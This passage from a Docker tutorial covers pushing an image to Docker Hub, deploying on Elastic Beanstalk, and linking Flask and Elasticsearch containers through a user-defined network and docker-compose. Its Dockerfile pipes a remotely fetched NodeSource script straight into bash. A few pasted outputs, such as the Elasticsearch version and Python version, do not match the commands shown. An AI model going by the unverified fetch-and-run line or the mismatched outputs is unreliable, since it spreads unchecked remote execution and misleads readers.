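print(f"browse to http://localhost:{mapping['host_port']}/")
print(f"the app inside the container listens on {mapping['container_port']}")
```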
Congratulations! You have successfully created your first docker image.
Docker on AWS
What good is an application that can't be shared with friends, right? So in this section we are going to see how we can deploy our awesome application to the cloud so that we can share it with our friends! We're going to use AWS Elastic Beanstalk to get our application up and running in a few clicks. We'll also see how easy it is to make our application scalable and manageable with Beanstalk!
Docker push
The first thing that we need to do before we deploy our app to AWS is to publish our image on a registry which can be accessed by AWS. There are many different Docker registries you can use (you can even host your own). For now, let's use Docker Hub to publish the image.
If this is the first time you are pushing an image, the client will ask you to log in. Provide the same credentials that you used for logging into Docker Hub.
$ docker login
Login with your Docker ID to push and pull images from Docker Hub. If you do not have a Docker ID, head over to https://hub.docker.com to create one.
Username: yourusername
Password:
WARNING! Your password will be stored unencrypted in /Users/yourusername/.docker/config.json
Configure a credential helper to remove this warning. See
https://docs.docker.com/engine/reference/commandline/login/credential-store
Login Succeeded
To publish, just type the below command, remembering to replace the name of the image tag above with yours. It is important to have the format of yourusername/image_name so that the client knows where to publish.
$ docker push yourusername/catnip
Once that is done, you can view your image on Docker Hub. For example, here's the web page for my image.
Note: One thing that I'd like to clarify before we go ahead is that it is not imperative to host your image on a public registry (or any registry) in order to deploy to AWS. In case you're writing code for the next million-dollar unicorn startup you can totally skip this step. The reason why we're pushing our images publicly is that it makes deployment super simple by skipping a few intermediate configuration steps.
Now that your image is online, anyone who has docker installed can play with your app by typing just a single command.
$ docker run -p 8888:5000 yourusername/catnip
If you've pulled your hair out in setting up local dev environments / sharing application configuration in the past, you very well know how awesome this sounds. That's why Docker is so cool!
Beanstalk
AWS Elastic Beanstalk (EB) is a PaaS (Platform as a Service) offered by AWS. If you've used Heroku, Google App Engine etc. you'll feel right at home. As a developer, you just tell EB how to run your app and it takes care of the rest - including scaling, monitoring and even updates. In April 2014, EB added support for running single-container Docker deployments which is what we'll use to deploy our app. Although EB has a very intuitive CLI, it does require some setup, and to keep things simple we'll use the web UI to launch our application.
To follow along, you need a functioning AWS account. If you don't have one yet, please go ahead and create one now - you will need to enter your credit card information. But don't worry, it's free and anything we do in this tutorial will also be free! Let's get started.
Here are the steps:
- Login to your AWS console.
- Click on Elastic Beanstalk. It will be in the compute section on the top left. Alternatively, you can access the Elastic Beanstalk console.
- Click on "Create New Application" in the top right
- Give your app a memorable (but unique) name and provide an (optional) description
- In the New Environment screen, create a new environment and choose the Web Server Environment.
- Fill in the environment information by choosing a domain. This URL is what you'll share with your friends so make sure it's easy to remember.
- Under the base configuration section, choose Docker from the predefined platform.
- Now we need to upload our application code. But since our application is packaged in a Docker container, we just need to tell EB about our container. Open the Dockerrun.aws.json file located in the flask-app folder and edit the Name of the image to your image's name. Don't worry, I'll explain the contents of the file shortly. When you are done, click on the radio button for "Upload your Code", choose this file, and click on "Upload".
- Now click on "Create environment". The final screen that you see will have a few spinners indicating that your environment is being set up. It typically takes around 5 minutes for the first-time setup.
While we wait, let's quickly see what the Dockerrun.aws.json file contains. This file is basically an AWS specific file that tells EB details about our application and docker configuration.
{
"AWSEBDockerrunVersion": "1",
"Image": {
"Name": "prakhar1989/catnip",
"Update": "true"
},
"Ports": [
{
"ContainerPort": 5000,
"HostPort": 8000
}
],
"Logging": "/var/log/nginx"
}
The file should be pretty self-explanatory, but you can always reference the official documentation for more information. We provide the name of the image that EB should use along with a port that the container should open.
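If you'd rather generate this file than edit it by hand, a few lines of Python will do. The sketch below simply rebuilds the same structure as the file shown above with your own image name filled in. The function name and its defaults are my own choices; the keys and values are copied from the file in the repository.

```python
import json


def build_dockerrun(image_name, container_port=5000, host_port=8000):
    """Build the same single-container structure as the file shown above."""
    return {
        "AWSEBDockerrunVersion": "1",
        "Image": {"Name": image_name, "Update": "true"},
        "Ports": [{"ContainerPort": container_port, "HostPort": host_port}],
        "Logging": "/var/log/nginx",
    }


config = build_dockerrun("yourusername/catnip")
print(json.dumps(config, indent=2))
```

Redirect the printed JSON into a file named Dockerrun.aws.json and upload that instead.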
Hopefully by now, our instance should be ready. Head over to the EB page and you should see a green tick indicating that your app is alive and kicking.
Go ahead and open the URL in your browser and you should see the application in all its glory. Feel free to email / IM / snapchat this link to your friends and family so that they can enjoy a few cat gifs, too.
Cleanup
Once you're done basking in the glory of your app, remember to terminate the environment so that you don't end up getting charged for extra resources.
Congratulations! You have deployed your first Docker application! That might seem like a lot of steps, but with the command-line tool for EB you can almost mimic the functionality of Heroku in a few keystrokes! Hopefully, you agree that Docker takes away a lot of the pains of building and deploying applications in the cloud. I would encourage you to read the AWS documentation on single-container Docker environments to get an idea of what features exist.
In the next (and final) part of the tutorial, we'll up the ante a bit and deploy an application that mimics the real-world more closely; an app with a persistent back-end storage tier. Let's get straight to it!
MULTI-CONTAINER ENVIRONMENTS
In the last section, we saw how easy and fun it is to run applications with Docker. We started with a simple static website and then tried a Flask app, both of which we could run locally and in the cloud with just a few commands. One thing both these apps had in common was that they were running in a single container.
Those of you who have experience running services in production know that apps nowadays are usually not that simple. There's almost always a database (or any other kind of persistent storage) involved. Systems such as Redis and Memcached have become de rigueur in most web application architectures. Hence, in this section we are going to spend some time learning how to Dockerize applications which rely on different services to run.
In particular, we are going to see how we can run and manage multi-container docker environments. Why multi-container you might ask? Well, one of the key points of Docker is the way it provides isolation. The idea of bundling a process with its dependencies in a sandbox (called a container) is what makes this so powerful.
Just like it's a good strategy to decouple your application tiers, it is wise to keep containers for each of the services separate. Each tier is likely to have different resource needs and those needs might grow at different rates. By separating the tiers into different containers, we can compose each tier using the most appropriate instance type based on different resource needs. This also plays in very well with the whole microservices movement which is one of the main reasons why Docker (or any other container technology) is at the forefront of modern microservices architectures.
SF Food Trucks
The app that we're going to Dockerize is called SF Food Trucks. My goal in building this app was to have something that is useful (in that it resembles a real-world application), relies on at least one service, but is not too complex for the purpose of this tutorial. This is what I came up with.
The app's backend is written in Python (Flask) and for search it uses Elasticsearch. Like everything else in this tutorial, the entire source is available on GitHub. We'll use this as our candidate application for learning how to build, run and deploy a multi-container environment.
First up, let's clone the repository locally.
$ git clone https://github.com/prakhar1989/FoodTrucks
$ cd FoodTrucks
$ tree -L 2
.
├── Dockerfile
├── README.md
├── aws-compose.yml
├── docker-compose.yml
├── flask-app
│ ├── app.py
│ ├── package-lock.json
│ ├── package.json
│ ├── requirements.txt
│ ├── static
│ ├── templates
│ └── webpack.config.js
├── setup-aws-ecs.sh
├── setup-docker.sh
├── shot.png
└── utils
    ├── generate_geojson.py
    └── trucks.geojson
The flask-app folder contains the Python application, while the utils folder has some utilities to load the data into Elasticsearch. The directory also contains some YAML files and a Dockerfile, all of which we'll see in greater detail as we progress through this tutorial. If you are curious, feel free to take a look at the files.
Now that you're excited (hopefully), let's think of how we can Dockerize the app. We can see that the application consists of a Flask backend server and an Elasticsearch service. A natural way to split this app would be to have two containers - one running the Flask process and another running the Elasticsearch (ES) process. That way if our app becomes popular, we can scale it by adding more containers depending on where the bottleneck lies.
Great, so we need two containers. That shouldn't be hard right? We've already built our own Flask container in the previous section. And for Elasticsearch, let's see if we can find something on the hub.
$ docker search elasticsearch
NAME DESCRIPTION STARS OFFICIAL AUTOMATED
elasticsearch Elasticsearch is a powerful open source se... 697 [OK]
itzg/elasticsearch Provides an easily configurable Elasticsea... 17 [OK]
tutum/elasticsearch Elasticsearch image - listens in port 9200. 15 [OK]
barnybug/elasticsearch Latest Elasticsearch 1.7.2 and previous re... 15 [OK]
digitalwonderland/elasticsearch Latest Elasticsearch with Marvel & Kibana 12 [OK]
monsantoco/elasticsearch ElasticSearch Docker image 9 [OK]
Quite unsurprisingly, there exists an officially supported image for Elasticsearch. To get ES running, we can simply use docker run and have a single-node ES container running locally within no time.
Note: Elastic, the company behind Elasticsearch, maintains its own registry for Elastic products. It's recommended to use the images from that registry if you plan to use Elasticsearch.
Let's first pull the image
$ docker pull docker.elastic.co/elasticsearch/elasticsearch:6.3.2
and then run it in development mode by specifying ports and setting an environment variable that configures the Elasticsearch cluster to run as a single-node.
$ docker run -d --name es -p 9200:9200 -p 9300:9300 -e "discovery.type=single-node" docker.elastic.co/elasticsearch/elasticsearch:6.3.2
277451c15ec183dd939e80298ea4bcf55050328a39b04124b387d668e3ed3943
Note: If your container runs into memory issues, you might need to tweak some JVM flags to limit its memory consumption.
As seen above, we use --name es to give our container a name which makes it easy to use in subsequent commands. Once the container is started, we can inspect its logs by running docker container logs with the container name (or ID). You should see logs similar to those below if Elasticsearch started successfully.
Note: Elasticsearch takes a few seconds to start so you might need to wait before you see initialized in the logs.
$ docker container ls
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
277451c15ec1 docker.elastic.co/elasticsearch/elasticsearch:6.3.2 "/usr/local/bin/dock…" 2 minutes ago Up 2 minutes 0.0.0.0:9200->9200/tcp, 0.0.0.0:9300->9300/tcp es
$ docker container logs es
[2018-07-29T05:49:09,304][INFO ][o.e.n.Node ] [] initializing ...
[2018-07-29T05:49:09,385][INFO ][o.e.e.NodeEnvironment ] [L1VMyzt] using [1] data paths, mounts [[/ (overlay)]], net usable_space [54.1gb], net total_space [62.7gb], types [overlay]
[2018-07-29T05:49:09,385][INFO ][o.e.e.NodeEnvironment ] [L1VMyzt] heap size [990.7mb], compressed ordinary object pointers [true]
[2018-07-29T05:49:11,979][INFO ][o.e.p.PluginsService ] [L1VMyzt] loaded module [x-pack-security]
[2018-07-29T05:49:11,980][INFO ][o.e.p.PluginsService ] [L1VMyzt] loaded module [x-pack-sql]
[2018-07-29T05:49:11,980][INFO ][o.e.p.PluginsService ] [L1VMyzt] loaded module [x-pack-upgrade]
[2018-07-29T05:49:11,980][INFO ][o.e.p.PluginsService ] [L1VMyzt] loaded module [x-pack-watcher]
[2018-07-29T05:49:11,981][INFO ][o.e.p.PluginsService ] [L1VMyzt] loaded plugin [ingest-geoip]
[2018-07-29T05:49:11,981][INFO ][o.e.p.PluginsService ] [L1VMyzt] loaded plugin [ingest-user-agent]
[2018-07-29T05:49:17,659][INFO ][o.e.d.DiscoveryModule ] [L1VMyzt] using discovery type [single-node]
[2018-07-29T05:49:18,962][INFO ][o.e.n.Node ] [L1VMyzt] initialized
[2018-07-29T05:49:18,963][INFO ][o.e.n.Node ] [L1VMyzt] starting ...
[2018-07-29T05:49:19,218][INFO ][o.e.t.TransportService ] [L1VMyzt] publish_address {172.17.0.2:9300}, bound_addresses {0.0.0.0:9300}
[2018-07-29T05:49:19,302][INFO ][o.e.x.s.t.n.SecurityNetty4HttpServerTransport] [L1VMyzt] publish_address {172.17.0.2:9200}, bound_addresses {0.0.0.0:9200}
[2018-07-29T05:49:19,303][INFO ][o.e.n.Node ] [L1VMyzt] started
[2018-07-29T05:49:19,439][WARN ][o.e.x.s.a.s.m.NativeRoleMappingStore] [L1VMyzt] Failed to clear cache for realms [[]]
[2018-07-29T05:49:19,542][INFO ][o.e.g.GatewayService ] [L1VMyzt] recovered [0] indices into cluster_state
Now, let's see if we can send a request to the Elasticsearch container. We use port 9200 to send a cURL request to the container.
$ curl 0.0.0.0:9200
{
"name" : "ijJDAOm",
"cluster_name" : "docker-cluster",
"cluster_uuid" : "a_nSV3XmTCqpzYYzb-LhNw",
"version" : {
"number" : "6.3.2",
"build_flavor" : "default",
"build_type" : "tar",
"build_hash" : "053779d",
"build_date" : "2018-07-20T05:20:23.451332Z",
"build_snapshot" : false,
"lucene_version" : "7.3.1",
"minimum_wire_compatibility_version" : "5.6.0",
"minimum_index_compatibility_version" : "5.0.0"
},
"tagline" : "You Know, for Search"
}
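The same check can be done from Python with nothing but the standard library. This is a small sketch, with function names of my own choosing, that requests the root endpoint and pulls out the cluster name and version number. It assumes the es container from above is running and published on localhost port 9200. The parsing step is kept separate so it can be tried on a sample response without a running container.

```python
import json
import urllib.request


def parse_es_info(body):
    """Extract the cluster name and version number from the root response."""
    info = json.loads(body)
    return info["cluster_name"], info["version"]["number"]


def fetch_es_info(url="http://localhost:9200", timeout=5):
    """Request the root endpoint; needs the es container from above running."""
    with urllib.request.urlopen(url, timeout=timeout) as response:
        return parse_es_info(response.read().decode("utf-8"))


# A trimmed copy of the response shown above, used as sample input.
sample = (
    '{"cluster_name": "docker-cluster", '
    '"version": {"number": "6.3.2"}, '
    '"tagline": "You Know, for Search"}'
)
print(parse_es_info(sample))
```

Calling fetch_es_info() while the container is up should report the same cluster name and version that curl printed.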
Sweet! It's looking good! While we are at it, let's get our Flask container running too. But before we get to that, we need a Dockerfile. In the last section, we used the python:3.8 image as our base image. This time, however, apart from installing Python dependencies via pip, we want our application to also generate our minified JavaScript file for production. For this, we'll require Node.js. Since we need a custom build step, we'll start from the ubuntu base image to build our Dockerfile from scratch.
Note: if you find that an existing image doesn't cater to your needs, feel free to start from another base image and tweak it yourself. For most of the images on Docker Hub, you should be able to find the corresponding Dockerfile on GitHub. Reading through existing Dockerfiles is one of the best ways to learn how to roll your own.
Our Dockerfile for the flask app looks like below -
# start from base
FROM ubuntu:18.04
MAINTAINER Prakhar Srivastav <prakhar@prakhar.me>
# install system-wide deps for python and node
RUN apt-get -yqq update
RUN apt-get -yqq install python3-pip python3-dev curl gnupg
RUN curl -sL https://deb.nodesource.com/setup_10.x | bash
RUN apt-get install -yq nodejs
# copy our application code
ADD flask-app /opt/flask-app
WORKDIR /opt/flask-app
# fetch app specific deps
RUN npm install
RUN npm run build
RUN pip3 install -r requirements.txt
# expose port
EXPOSE 5000
# start app
CMD [ "python3", "./app.py" ]
Quite a few new things here so let's quickly go over this file. We start off with the Ubuntu LTS base image and use the package manager apt-get to install the dependencies, namely Python and Node. The -yqq flag is used to suppress output and assumes "Yes" to all prompts.
We then use the ADD command to copy our application into a new directory in the container - /opt/flask-app. This is where our code will reside. We also set this as our working directory, so that the following commands will be run in the context of this location. Now that our system-wide dependencies are installed, we get around to installing app-specific ones. First off we tackle Node by installing the packages from npm and running the build command as defined in our package.json file. We finish the file off by installing the Python packages, exposing the port and defining the CMD to run as we did in the last section.
Finally, we can go ahead, build the image and run the container (replace yourusername with your username below).
$ docker build -t yourusername/foodtrucks-web .
In the first run, this will take some time as the Docker client will download the ubuntu image, run all the commands and prepare your image. Re-running docker build after any subsequent changes you make to the application code will be much faster, since Docker reuses the cached results of steps that have not changed. Now let's try running our app.
$ docker run -P --rm yourusername/foodtrucks-web
Unable to connect to ES. Retying in 5 secs...
Unable to connect to ES. Retying in 5 secs...
Unable to connect to ES. Retying in 5 secs...
Out of retries. Bailing out...
Oops! Our flask app was unable to run since it was unable to connect to Elasticsearch. How do we tell one container about the other container and get them to talk to each other? The answer lies in the next section.
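The messages above suggest that the app tries to reach Elasticsearch a few times and then gives up. The app's actual code isn't shown here, so the following is only a sketch of that retry pattern under my own assumptions: the function names, the default of three attempts, and the use of a plain TCP connection as the check are all hypothetical.

```python
import socket
import time


def port_is_open(host, port, timeout=1.0):
    """Return True if a TCP connection to host:port succeeds."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        # Covers refused connections, timeouts and unresolvable host names.
        return False


def wait_for(check, retries=3, delay=5, sleep=time.sleep):
    """Call check() up to `retries` times, pausing `delay` seconds after a failure."""
    for attempt in range(1, retries + 1):
        if check():
            return True
        if attempt < retries:
            sleep(delay)
    return False
```

A call such as wait_for(lambda: port_is_open("es", 9200)) would keep returning False in our current setup, because the Flask container has no way to reach a host named es yet.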
Docker Network
Before we talk about the features Docker provides especially to deal with such scenarios, let's see if we can figure out a way to get around the problem. Hopefully, this should give you an appreciation for the specific feature that we are going to study.
Okay, so let's run docker container ls (which is the same as docker ps) and see what we have.
$ docker container ls
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
277451c15ec1 docker.elastic.co/elasticsearch/elasticsearch:6.3.2 "/usr/local/bin/dock…" 17 minutes ago Up 17 minutes 0.0.0.0:9200->9200/tcp, 0.0.0.0:9300->9300/tcp es
So we have one ES container running on 0.0.0.0:9200 which we can directly access. If we can tell our Flask app to connect to this URL, it should be able to connect and talk to ES, right? Let's dig into our Python code and see how the connection details are defined.
es = Elasticsearch(host='es')
To make this work, we need to tell the Flask container that the ES container is running on the 0.0.0.0 host (the port by default is 9200) and that should make it work, right? Unfortunately, that is not correct since the IP 0.0.0.0 is the IP to access the ES container from the host machine, i.e. from my Mac. Another container will not be able to access this on the same IP address. Okay, if not that IP, then which IP address should the ES container be accessible by? I'm glad you asked this question.
Now is a good time to start our exploration of networking in Docker. When docker is installed, it creates three networks automatically.
$ docker network ls
NETWORK ID NAME DRIVER SCOPE
c2c695315b3a bridge bridge local
a875bec5d6fd host host local
ead0e804a67b none null local
The bridge network is the network in which containers are run by default. So that means that when I ran the ES container, it was running in this bridge network. To validate this, let's inspect the network.
$ docker network inspect bridge
[
{
"Name": "bridge",
"Id": "c2c695315b3aaf8fc30530bb3c6b8f6692cedd5cc7579663f0550dfdd21c9a26",
"Created": "2018-07-28T20:32:39.405687265Z",
"Scope": "local",
"Driver": "bridge",
"EnableIPv6": false,
"IPAM": {
"Driver": "default",
"Options": null,
"Config": [
{
"Subnet": "172.17.0.0/16",
"Gateway": "172.17.0.1"
}
]
},
"Internal": false,
"Attachable": false,
"Ingress": false,
"ConfigFrom": {
"Network": ""
},
"ConfigOnly": false,
"Containers": {
"277451c15ec183dd939e80298ea4bcf55050328a39b04124b387d668e3ed3943": {
"Name": "es",
"EndpointID": "5c417a2fc6b13d8ec97b76bbd54aaf3ee2d48f328c3f7279ee335174fbb4d6bb",
"MacAddress": "02:42:ac:11:00:02",
"IPv4Address": "172.17.0.2/16",
"IPv6Address": ""
}
},
"Options": {
"com.docker.network.bridge.default_bridge": "true",
"com.docker.network.bridge.enable_icc": "true",
"com.docker.network.bridge.enable_ip_masquerade": "true",
"com.docker.network.bridge.host_binding_ipv4": "0.0.0.0",
"com.docker.network.bridge.name": "docker0",
"com.docker.network.driver.mtu": "1500"
},
"Labels": {}
}
]
You can see that our container 277451c15ec1 is listed under the Containers section in the output. What we also see is the IP address this container has been allotted - 172.17.0.2. Is this the IP address that we're looking for? Let's find out by running our flask container and trying to access this IP.
$ docker run -it --rm yourusername/foodtrucks-web bash
root@35180ccc206a:/opt/flask-app# curl 172.17.0.2:9200
{
"name" : "Jane Foster",
"cluster_name" : "elasticsearch",
"version" : {
"number" : "2.1.1",
"build_hash" : "40e2c53a6b6c2972b3d13846e450e66f4375bd71",
"build_timestamp" : "2015-12-15T13:05:55Z",
"build_snapshot" : false,
"lucene_version" : "5.3.1"
},
"tagline" : "You Know, for Search"
}
root@35180ccc206a:/opt/flask-app# exit
This should be fairly straightforward to you by now. We start the container in the interactive mode with the bash process. The --rm is a convenient flag for running one off commands since the container gets cleaned up when its work is done. We try a curl but we need to install it first. Once we do that, we see that we can indeed talk to ES on 172.17.0.2:9200. Awesome!
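Reading the IP address out of the inspect output by eye works, but the output is plain JSON, so it is just as easy to pick it out with a script. Here is a minimal Python sketch that does this for a trimmed copy of the bridge network output shown earlier, and also confirms that the address falls inside the network's subnet. The function names are my own.

```python
import ipaddress
import json

# Trimmed copy of the `docker network inspect bridge` output shown earlier.
INSPECT_OUTPUT = """
[
  {
    "Name": "bridge",
    "IPAM": {"Config": [{"Subnet": "172.17.0.0/16", "Gateway": "172.17.0.1"}]},
    "Containers": {
      "277451c15ec183dd939e80298ea4bcf55050328a39b04124b387d668e3ed3943": {
        "Name": "es",
        "IPv4Address": "172.17.0.2/16"
      }
    }
  }
]
"""


def container_addresses(inspect_json):
    """Map container name -> IPv4 address (without the prefix length)."""
    network = json.loads(inspect_json)[0]
    return {
        details["Name"]: details["IPv4Address"].split("/")[0]
        for details in network["Containers"].values()
    }


def in_network_subnet(inspect_json, address):
    """Check that an address falls inside the network's first configured subnet."""
    network = json.loads(inspect_json)[0]
    subnet = ipaddress.ip_network(network["IPAM"]["Config"][0]["Subnet"])
    return ipaddress.ip_address(address) in subnet


addresses = container_addresses(INSPECT_OUTPUT)
print(addresses)
print(in_network_subnet(INSPECT_OUTPUT, addresses["es"]))
```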
Although we have figured out a way to make the containers talk to each other, there are still two problems with this approach -
- How do we tell the Flask container that the es hostname stands for 172.17.0.2 or some other IP since the IP can change?
- Since the bridge network is shared by every container by default, this method is not secure. How do we isolate our network?
The good news is that Docker has a great answer to our questions. It allows us to define our own networks while keeping them isolated using the docker network command.
Let's first go ahead and create our own network.
$ docker network create foodtrucks-net
0815b2a3bb7a6608e850d05553cc0bda98187c4528d94621438f31d97a6fea3c
$ docker network ls
NETWORK ID NAME DRIVER SCOPE
c2c695315b3a bridge bridge local
0815b2a3bb7a foodtrucks-net bridge local
a875bec5d6fd host host local
ead0e804a67b none null local
The network create command creates a new bridge network, which is what we need at the moment. In terms of Docker, a bridge network uses a software bridge which allows containers connected to the same bridge network to communicate, while providing isolation from containers which are not connected to that bridge network. The Docker bridge driver automatically installs rules in the host machine so that containers on different bridge networks cannot communicate directly with each other. There are other kinds of networks that you can create, and you are encouraged to read about them in the official docs.
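One way to picture the rule described above is as a simple membership test: two containers can talk directly only if they are attached to the same network. The Python sketch below is a toy model of that idea and nothing more. It does not reflect how the bridge driver actually enforces isolation, and the container names in the example layout (including other-app) are hypothetical.

```python
def can_communicate(memberships, first, second):
    """Return True if two containers share at least one network.

    `memberships` maps a network name to the set of attached container names.
    This is a toy model of the rule described above, not Docker's firewall logic.
    """
    return any(
        first in members and second in members
        for members in memberships.values()
    )


# Hypothetical layout: `other-app` stays on the default bridge network.
memberships = {
    "bridge": {"other-app"},
    "foodtrucks-net": {"es", "foodtrucks-web"},
}
print(can_communicate(memberships, "es", "foodtrucks-web"))
print(can_communicate(memberships, "es", "other-app"))
```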
Now that we have a network, we can launch our containers inside this network using the --net flag. Let's do that - but first, in order to launch a new container with the same name, we will stop and remove our ES container that is running in the bridge (default) network.
$ docker container stop es
es
$ docker container rm es
es
$ docker run -d --name es --net foodtrucks-net -p 9200:9200 -p 9300:9300 -e "discovery.type=single-node" docker.elastic.co/elasticsearch/elasticsearch:6.3.2
13d6415f73c8d88bddb1f236f584b63dbaf2c3051f09863a3f1ba219edba3673
$ docker network inspect foodtrucks-net
[
{
"Name": "foodtrucks-net",
"Id": "0815b2a3bb7a6608e850d05553cc0bda98187c4528d94621438f31d97a6fea3c",
"Created": "2018-07-30T00:01:29.1500984Z",
"Scope": "local",
"Driver": "bridge",
"EnableIPv6": false,
"IPAM": {
"Driver": "default",
"Options": {},
"Config": [
{
"Subnet": "172.18.0.0/16",
"Gateway": "172.18.0.1"
}
]
},
"Internal": false,
"Attachable": false,
"Ingress": false,
"ConfigFrom": {
"Network": ""
},
"ConfigOnly": false,
"Containers": {
"13d6415f73c8d88bddb1f236f584b63dbaf2c3051f09863a3f1ba219edba3673": {
"Name": "es",
"EndpointID": "29ba2d33f9713e57eb6b38db41d656e4ee2c53e4a2f7cf636bdca0ec59cd3aa7",
"MacAddress": "02:42:ac:12:00:02",
"IPv4Address": "172.18.0.2/16",
"IPv6Address": ""
}
},
"Options": {},
"Labels": {}
}
]
As you can see, our es container is now running inside the foodtrucks-net bridge network. Now let's inspect what happens when we launch our Flask container in the foodtrucks-net network.
$ docker run -it --rm --net foodtrucks-net yourusername/foodtrucks-web bash
root@9d2722cf282c:/opt/flask-app# curl es:9200
{
"name" : "wWALl9M",
"cluster_name" : "docker-cluster",
"cluster_uuid" : "BA36XuOiRPaghPNBLBHleQ",
"version" : {
"number" : "6.3.2",
"build_flavor" : "default",
"build_type" : "tar",
"build_hash" : "053779d",
"build_date" : "2018-07-20T05:20:23.451332Z",
"build_snapshot" : false,
"lucene_version" : "7.3.1",
"minimum_wire_compatibility_version" : "5.6.0",
"minimum_index_compatibility_version" : "5.0.0"
},
"tagline" : "You Know, for Search"
}
root@53af252b771a:/opt/flask-app# ls
app.py node_modules package.json requirements.txt static templates webpack.config.js
root@53af252b771a:/opt/flask-app# python3 app.py
Index not found...
Loading data in elasticsearch ...
Total trucks loaded: 733
* Running on http://0.0.0.0:5000/ (Press CTRL+C to quit)
root@53af252b771a:/opt/flask-app# exit
Wohoo! That works! On user-defined networks like foodtrucks-net, containers can not only communicate by IP address, but can also resolve a container name to an IP address. This capability is called automatic service discovery. Great! Let's launch our Flask container for real now -
$ docker run -d --net foodtrucks-net -p 5000:5000 --name foodtrucks-web yourusername/foodtrucks-web
852fc74de2954bb72471b858dce64d764181dca0cf7693fed201d76da33df794
$ docker container ls
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
852fc74de295 yourusername/foodtrucks-web "python3 ./app.py" About a minute ago Up About a minute 0.0.0.0:5000->5000/tcp foodtrucks-web
13d6415f73c8 docker.elastic.co/elasticsearch/elasticsearch:6.3.2 "/usr/local/bin/dock…" 17 minutes ago Up 17 minutes 0.0.0.0:9200->9200/tcp, 0.0.0.0:9300->9300/tcp es
$ curl -I 0.0.0.0:5000
HTTP/1.0 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 3697
Server: Werkzeug/0.11.2 Python/2.7.6
Date: Sun, 10 Jan 2016 23:58:53 GMT
Head over to http://0.0.0.0:5000 and see your glorious app live! Although that might have seemed like a lot of work, we actually just typed 4 commands to go from zero to running. I've collated the commands in a bash script.
#!/bin/bash
# build the flask container
docker build -t yourusername/foodtrucks-web .
# create the network
docker network create foodtrucks-net
# start the ES container
docker run -d --name es --net foodtrucks-net -p 9200:9200 -p 9300:9300 -e "discovery.type=single-node" docker.elastic.co/elasticsearch/elasticsearch:6.3.2
# start the flask app container
docker run -d --net foodtrucks-net -p 5000:5000 --name foodtrucks-web yourusername/foodtrucks-web
Now imagine you are distributing your app to a friend, or running on a server that has docker installed. You can get a whole app running with just one command!
$ git clone https://github.com/prakhar1989/FoodTrucks
$ cd FoodTrucks
$ ./setup-docker.sh
And that's it! If you ask me, I find this to be an extremely awesome, and a powerful way of sharing and running your applications!
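If you'd rather drive these steps from Python than from bash, here is a minimal sketch of the same four commands. It only assembles the argument lists and prints them unless you turn off the dry run. The names setup_commands, run_all and the dry_run flag are my own for illustration and are not part of the repo; the image, network and container names are the ones used above.

```python
import shlex
import subprocess

ES_IMAGE = "docker.elastic.co/elasticsearch/elasticsearch:6.3.2"


def setup_commands(username="yourusername", network="foodtrucks-net"):
    """Return the four docker invocations from the bash script as argv lists."""
    web_image = f"{username}/foodtrucks-web"
    return [
        # build the flask container
        ["docker", "build", "-t", web_image, "."],
        # create the network
        ["docker", "network", "create", network],
        # start the ES container
        ["docker", "run", "-d", "--name", "es", "--net", network,
         "-p", "9200:9200", "-p", "9300:9300",
         "-e", "discovery.type=single-node", ES_IMAGE],
        # start the flask app container
        ["docker", "run", "-d", "--net", network, "-p", "5000:5000",
         "--name", "foodtrucks-web", web_image],
    ]


def run_all(commands, dry_run=True):
    """Print each command; execute it only when dry_run is False."""
    for argv in commands:
        print("$", shlex.join(argv))
        if not dry_run:
            subprocess.run(argv, check=True)  # stop at the first failure


if __name__ == "__main__":
    run_all(setup_commands())
```

Keeping the commands as lists (rather than one long string) avoids shell quoting surprises, and the dry run lets you check what would be executed before touching Docker.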
Docker Compose
Till now we've spent all our time exploring the Docker client. In the Docker ecosystem, however, there are a bunch of other open-source tools which play very nicely with Docker. A few of them are -
- Docker Machine - Create Docker hosts on your computer, on cloud providers, and inside your own data center
- Docker Compose - A tool for defining and running multi-container Docker applications.
- Docker Swarm - A native clustering solution for Docker
- Kubernetes - Kubernetes is an open-source system for automating deployment, scaling, and management of containerized applications.
In this section, we are going to look at one of these tools, Docker Compose, and see how it can make dealing with multi-container apps easier.
The background story of Docker Compose is quite interesting. Roughly around January 2014, a company called OrchardUp launched a tool called Fig. The idea behind Fig was to make isolated development environments work with Docker. The project was very well received on Hacker News - I oddly remember reading about it but didn't quite get the hang of it.
The first comment on the forum actually does a good job of explaining what Fig is all about.
So really at this point, that's what Docker is about: running processes. Now Docker offers a quite rich API to run the processes: shared volumes (directories) between containers (i.e. running images), forward port from the host to the container, display logs, and so on. But that's it: Docker as of now, remains at the process level.
While it provides options to orchestrate multiple containers to create a single "app", it doesn't address the management of such group of containers as a single entity. And that's where tools such as Fig come in: talking about a group of containers as a single entity. Think "run an app" (i.e. "run an orchestrated cluster of containers") instead of "run a container".
It turns out that a lot of people using Docker agree with this sentiment. As Fig steadily became popular, Docker Inc. took notice, acquired the company and re-branded Fig as Docker Compose.
So what is Compose used for? Compose is a tool that is used for defining and running multi-container Docker apps in an easy way. It provides a configuration file called docker-compose.yml that can be used to bring up an application and the suite of services it depends on with just one command. Compose works in all environments: production, staging, development, testing, as well as CI workflows, although Compose is ideal for development and testing environments.
Let's see if we can create a docker-compose.yml file for our SF-Foodtrucks app and evaluate whether Docker Compose lives up to its promise.
The first step, however, is to install Docker Compose. If you're running Windows or Mac, Docker Compose is already installed as it comes in the Docker Toolbox. Linux users can easily get their hands on Docker Compose by following the instructions on the docs. Since Compose is written in Python, you can also simply do pip install docker-compose. Test your installation with -
$ docker-compose --version
docker-compose version 1.21.2, build a133471
Now that we have it installed, we can move on to the next step, i.e. the Docker Compose file docker-compose.yml. The syntax for YAML is quite simple and the repo already contains the docker-compose file that we'll be using.
version: "3"
services:
  es:
    image: docker.elastic.co/elasticsearch/elasticsearch:6.3.2
    container_name: es
    environment:
      - discovery.type=single-node
    ports:
      - 9200:9200
    volumes:
      - esdata1:/usr/share/elasticsearch/data
  web:
    image: yourusername/foodtrucks-web
    command: python3 app.py
    depends_on:
      - es
    ports:
      - 5000:5000
    volumes:
      - ./flask-app:/opt/flask-app
volumes:
  esdata1:
    driver: local
Let me break down what the file above means. At the parent level, we define the names of our services - es and web. Each service needs an image to run from, given here with the image parameter, and for each service that we want Docker to run, we can add additional parameters. For es, we just refer to the elasticsearch image available on the Elastic registry. For our Flask app, we refer to the image that we built at the beginning of this section.
